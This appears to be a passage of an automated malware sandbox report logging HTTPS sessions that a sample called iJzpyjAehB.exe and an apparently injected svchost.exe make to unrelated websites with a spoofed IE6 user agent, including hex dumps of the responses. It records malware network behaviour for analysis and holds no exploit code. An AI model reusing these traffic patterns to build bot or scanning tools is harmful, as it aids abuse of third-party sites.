                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1854OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1904INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:26 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:31 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:31 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b2Rb379puhpcP4vf2FzPGVjCwWU%2BCONey5dqkX3d%2FcXeBcjt9oFePNR69XogMUkvRpHxNqZEvp6D%2F16uHQmpszy1KC358rUpukaijtwM4X6e6aCXpvY3QnOtVMNJDhXL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8675a9d5c26-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1904INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1904INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        135192.168.2.66201983.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1854OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2180INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=95
                                                                                                                                                                                                                                                                        Content-Length: 48939
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:28 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2181INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2184INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                        Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2192INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                        Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2200INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                        Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2208INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                                        Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2216INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                                        2023-03-10 06:56:28 UTC2224INData Raw: 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e 67 2f
                                                                                                                                                                                                                                                                        Data Ascii: orm-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricing/


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        136192.168.2.662161185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1902OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1903INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:26 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:26 UTC1903INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        137192.168.2.662284188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1904OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1953INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:27 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H3KodTb96tJImeGB78xWLIJxkWJNaH2bHJ%2FTAIXQGnnLExZUM%2B%2FYv8Z4WkI6S0GUqGOi39ApfCjIxOhSVKElDMirxnzaIggW%2FPFa4PhXUOk9pKlE2MuKo%2FMf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8696ac62c71-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1954INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1954INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        138192.168.2.66223691.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1905OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:57:04 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1905INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1921INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1937INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1953INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
